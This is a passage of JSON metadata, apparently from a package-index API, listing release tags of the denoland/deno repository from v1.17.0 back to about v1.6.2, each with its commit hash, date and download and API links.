ts"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5d